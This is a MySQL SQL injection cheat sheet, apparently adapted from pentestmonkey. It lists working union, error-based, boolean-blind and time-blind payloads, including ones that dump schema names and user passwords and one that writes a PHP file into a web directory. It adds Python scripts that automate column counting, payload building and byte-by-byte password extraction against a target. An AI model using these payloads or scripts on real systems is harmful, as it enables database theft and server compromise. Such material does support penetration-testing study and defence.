MySQL injection summary

MySQL injection

SQL injection against MySQL works by smuggling SQL syntax into a web form field, a URL query string or another request parameter so that the application's back-end query executes attacker-supplied SQL. It is possible wherever the application builds its query by concatenating untrusted input into a SQL string instead of escaping it or using a parameterised query: the database then runs statements the developer never intended, and the attacker uses the application's own database connection and privileges to read, modify or write data.

MySQL general injection (union select)

  • Comment (query terminator)
    #
    -- (the space after the two dashes is required)
    /* ... */ (the trailing /* with no closing */ used in the payloads below relies on the server tolerating an unterminated comment, which older MySQL versions did; # or -- is the safer terminator)

  • Whitespace substitutes
    Use /**/, parentheses around expressions, or + (decoded to a space by the web server in URL query strings) instead of spaces
    %0c = form feed
    %09 = horizontal tab
    %0d = carriage return
    %0a = line feed
    %0b = vertical tab
  • Returning several values through one column

    concat() joins expressions from one row
    group_concat() joins one column from many rows into a single value (comma-separated by default, truncated at group_concat_max_len, 1024 bytes by default)
    concat_ws() joins with the separator given as its first argument

  • Information functions and system variables
    system_user()
    user()
    current_user()
    session_user()
    database()
    version()
    load_file()
    @@datadir
    @@basedir
    @@version_compile_os

  • General injection statements (union select)
    • View basic MySQL information

      and 1=2 union select 1,2,3,concat_ws(char(32,58,32),0x7c,user(),database(),version()),5,6,7/*

      The number of selected columns must match the original query, and the value only appears if the column it is placed in is rendered in the page.

    • Query the databases
      and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1/*
      and 1=2 union select 1,group_concat(schema_name),3,4 from information_schema.schemata/*

    • Query table names

      and 1=2 union select 1,2,3,4,table_name,5 from information_schema.tables where table_schema=0x<database name as hex> limit 1,1/*

      and 1=2 union select 1,2,3,4,group_concat(table_name),5 from information_schema.tables where table_schema=0x<database name as hex>/*

      Writing the name as a hex literal (0x...) keeps quote characters out of the payload; MySQL compares it as a string.

    • Query column names

      and 1=2 union select 1,2,3,4,column_name,5,6,7 from information_schema.columns where table_name=0x<table name as hex> and table_schema=0x<database name as hex> limit 1,1/*

      and 1=2 union select 1,2,3,4,group_concat(column_name),5,6,7 from information_schema.columns where table_name=0x<table name as hex> and table_schema=0x<database name as hex>/*

    • Check privileges (access to mysql.user, FILE privilege)

      and (select count(*) from mysql.user)>0/*

      and (select count(file_priv) from mysql.user)>0/*

      Either query only succeeds if the application's account can read mysql.user, which ordinary accounts cannot. count(file_priv) proves the column is readable, not that the privilege is granted; to test the FILE privilege itself, compare the file_priv value of the current user's row with 'Y'.

    • Read and write files

      union select 1,2,3,load_file('d:/web/logo123.jpg'),5,6,7,8,9,10,11 into outfile 'd:/web/90team.php'/*

      Use forward slashes or doubled backslashes ('d:\\web\\...') in the paths: inside a MySQL string literal a single backslash is an escape character, so 'd:\web' does not name the intended path. load_file() and into outfile both need the FILE privilege, a path the mysqld process can reach (the file is read or written by the server, not by the client), and a secure_file_priv setting that allows that directory (an empty value allows any, NULL disables file operations). into outfile refuses to overwrite an existing file.
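As an added example (not from this cheat sheet or from pentestmonkey's page): the union queries above assume two things that are found first, the column count of the injectable SELECT and hex-encoded names for the WHERE clauses. The Python below finds the count with `order by n` (accepted until n exceeds the column count), encodes identifiers as 0x literals and builds the schema/table/column enumeration payloads. Which position is reflected into the page is still read off by eye from the numbers. `demo_oracle` is a constructed offline stand-in for the HTTP request that pretends the vulnerable query has four columns; `mysql_hex`, `count_columns`, `union_payload` and `enumeration_payloads` are names chosen here.

```python
import re

def mysql_hex(s):
    """Encode a string as a MySQL hex literal (0x...), so the payload carries
    no quote characters; MySQL compares it as a string in WHERE clauses."""
    return "0x" + s.encode().hex()

def count_columns(oracle, max_cols=50):
    """Find the column count of the injectable SELECT: `order by n` is
    accepted while n <= column count and raises an error beyond it.
    `oracle(payload)` returns True when the page responds normally."""
    for n in range(1, max_cols + 1):
        if not oracle(f"order by {n}"):
            return n - 1
    return None  # not resolved within max_cols

def union_payload(ncols, expr, position, from_clause=""):
    """Build `and 1=2 union select ...` with `expr` in the 1-based `position`
    that is reflected into the page, numeric fillers elsewhere and an
    optional FROM/WHERE tail; terminated with `-- ` (the space matters)."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[position - 1] = expr
    tail = f" from {from_clause}" if from_clause else ""
    return "and 1=2 union select " + ",".join(cols) + tail + "-- "

def enumeration_payloads(ncols, position, db_name, table_name=None):
    """The schema -> table -> column walk from the cheat sheet, with the
    names the WHERE clauses need passed as hex literals."""
    payloads = {
        "databases": union_payload(ncols, "group_concat(schema_name)", position,
                                   "information_schema.schemata"),
        "tables": union_payload(ncols, "group_concat(table_name)", position,
                                f"information_schema.tables where table_schema={mysql_hex(db_name)}"),
    }
    if table_name:
        payloads["columns"] = union_payload(
            ncols, "group_concat(column_name)", position,
            f"information_schema.columns where table_schema={mysql_hex(db_name)}"
            f" and table_name={mysql_hex(table_name)}")
    return payloads

# Constructed stand-in for the HTTP request (assumption, not a real target):
# behaves as if the vulnerable query had four columns, so `order by 5` errors.
_ORDER_BY = re.compile(r"order by (\d+)")

def demo_oracle(payload):
    m = _ORDER_BY.search(payload)
    return True if m is None else int(m.group(1)) <= 4

if __name__ == "__main__":
    n = count_columns(demo_oracle)
    for name, p in enumeration_payloads(n, 2, "blind_sqli", "users").items():
        print(f"{name}: {p}")
```

Against a real target, `demo_oracle` is replaced by a function that sends the payload in the injectable parameter and returns whether the response looks like the normal page rather than an error.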

MySQL error-based injection

  • Duplicate group key with floor(rand(0)*2):
    and (select 1 from (select count(*),concat((select (select (Statement)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
    Replace (Statement) with a subquery that returns one row, e.g.: select distinct concat(0x7e,0x27,schema_name,0x27,0x7e) from information_schema.schemata limit 0,1
    The value comes back inside the error message "Duplicate entry '...' for key 'group_key'". The table in the inner FROM must supply at least three rows, which information_schema.tables always does.
  • Duplicate column name with NAME_CONST (its arguments must be constant expressions, for example version()):
    and 1=(select * from (select NAME_CONST((Statement),1),NAME_CONST((Statement),1)) as x)-- 
  • The same duplicate-key trick inside UPDATE and INSERT statements; substring(...,1,62) keeps the leaked value within the 64 characters the error message quotes:
    update web_ids set host='www.0x50sec.org' where id=1 and (select 1 from (select count(*),concat(floor(rand(0)*2),(substring((select (Statement)),1,62)))a from information_schema.tables group by a)b);
    insert into web_ids(host) values((select (1) from mysql.user where 1=1 and (select 1 from (select count(*),concat(floor(rand(0)*2),(substring((select (Statement)),1,62)))a from information_schema.tables group by a)b)));
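Why the floor(rand(0)*2) payloads above raise an error, as an added illustration that is not part of the cheat sheet: the Python below reimplements the my_rnd() generator that MySQL seeds with RAND(0) (a reimplementation from memory of the MySQL source, so the constants are an assumption, but they reproduce the published 0,1,1,0,1,1 sequence) and models how GROUP BY fills its temporary table, computing the key once to look a group up and again when inserting a new group. `MySQLRand`, `floor_rand0_times_2` and `simulate_group_by` are names chosen here.

```python
MAX_VALUE = 0x3FFFFFFF  # modulus used by MySQL's my_rnd()

class MySQLRand:
    """Reimplementation (from memory of the MySQL source; an assumption) of
    the my_rnd() linear congruential generator as seeded by RAND(seed)."""

    def __init__(self, seed=0):
        self.seed1 = (seed * 0x10001 + 55555555) % MAX_VALUE
        self.seed2 = (seed * 0x10000001) % MAX_VALUE

    def next(self):
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE

def floor_rand0_times_2(n, seed=0):
    """The values floor(rand(seed)*2) yields for the first n rows."""
    rng = MySQLRand(seed)
    return [int(rng.next() * 2) for _ in range(n)]

def simulate_group_by(nrows, seed=0):
    """Model of how GROUP BY fills its temporary table when the key is a
    non-deterministic expression: the key is computed once to look the
    group up and, if the group is new, computed again for the insert.
    Returns the duplicate-key error text on the first collision, else None."""
    rng = MySQLRand(seed)
    groups = {}
    for row in range(1, nrows + 1):
        key = int(rng.next() * 2)          # evaluated for the lookup
        if key in groups:
            groups[key] += 1
            continue
        key = int(rng.next() * 2)          # evaluated again for the insert
        if key in groups:
            return f"row {row}: Duplicate entry '{key}' for key 'group_key'"
        groups[key] = 1
    return None

if __name__ == "__main__":
    print(floor_rand0_times_2(6))      # [0, 1, 1, 0, 1, 1]
    print(simulate_group_by(2))        # None: two rows are not enough
    print(simulate_group_by(3))        # collision on the third row
```

Row 1 looks up key 0, finds nothing and inserts under the re-evaluated key 1; row 2 looks up key 1 and finds it; row 3 looks up key 0, finds nothing and tries to insert under key 1 again, which already exists. That is why the inner FROM needs at least three rows, and why the subquery result is concatenated into the key: the error message quotes the duplicate key, so the data travels out inside it.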

MySQL boolean-based blind injection

  • Use ASCII
    AND ascii(substring((SELECT password FROM users where id=1),1,1))=49
    Comparing with > instead of = lets each character be found by binary search in about eight requests; a position past the end of the string gives ascii('')=0.
  • Use regular expressions

    and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA='blind_sqli' AND table_name REGEXP '^[a-n]' LIMIT 0,1)

MySQL time-based blind injection

  • 1170 union select if(substring(current,1,1)=char(11),benchmark(5000000,encode('msg','by 5 seconds')),null) from (select database() as current) as tbl
  • UNION SELECT IF(SUBSTRING(Password,1,1)='a',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User='root'
    benchmark() delays depend on server speed and load, and encode() was removed in MySQL 8.0; since MySQL 5.0.12, sleep(N) in the same if() gives a fixed delay and is the usual choice.
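Automating the boolean-based and time-based blind queries above, as an added example that is not from the cheat sheet: instead of testing one byte value per request with =, the code binary-searches each byte with > comparisons (eight requests per character), stops when ascii() of a position past the end of the string returns 0, and builds the same condition either as a boolean test or wrapped in if(...,sleep(5),0) for a timing oracle. `oracle` stands for whatever sends the payload and classifies the response; `demo_oracle` and `DEMO_SECRET` are a constructed offline stand-in, not a real target, and all function names are chosen here.

```python
import re

def boolean_payload(subquery, pos, threshold):
    """Boolean condition: is the byte at 1-based `pos` of the subquery's
    result greater than `threshold`? Appended to a numeric WHERE clause."""
    return f"and ascii(substring(({subquery}),{pos},1))>{threshold}"

def time_payload(subquery, pos, threshold, delay=5):
    """The same test as a timing side channel: only a true comparison sleeps."""
    return f"and if(ascii(substring(({subquery}),{pos},1))>{threshold},sleep({delay}),0)"

def extract(oracle, subquery, max_len=64, build=boolean_payload):
    """Recover the subquery's string result byte by byte. `oracle(payload)`
    returns True when the injected condition held (page unchanged for the
    boolean form, response delayed for the time form). Each byte is found by
    binary search over 0..255; substring() past the end gives '' and
    ascii('')=0 (ascii(NULL) compares false as well), which ends the loop."""
    result = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 255
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(build(subquery, pos, mid)):
                lo = mid + 1            # byte > mid
            else:
                hi = mid                # byte <= mid
        if lo == 0:
            break                       # past the end of the string
        result.append(chr(lo))
    return "".join(result)

# Constructed offline stand-in for the target (assumption): answers the
# comparison against a fixed secret instead of sending an HTTP request.
DEMO_SECRET = "5f4dcc3b"
_CMP = re.compile(r",(\d+),1\)\)>(\d+)")

def demo_oracle(payload):
    m = _CMP.search(payload)
    pos, threshold = int(m.group(1)), int(m.group(2))
    byte = ord(DEMO_SECRET[pos - 1]) if pos <= len(DEMO_SECRET) else 0
    return byte > threshold

if __name__ == "__main__":
    print(extract(demo_oracle, "select password from users where id=1"))
```

With a timing oracle, the real `oracle` sends `time_payload(...)`, measures the round trip and returns True when it took at least the delay; the `extract` loop is unchanged. Timing classification should use a delay comfortably above the target's normal jitter and retry ambiguous answers, since one misclassified comparison corrupts the rest of that byte's search.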

Reference: pentestmonkey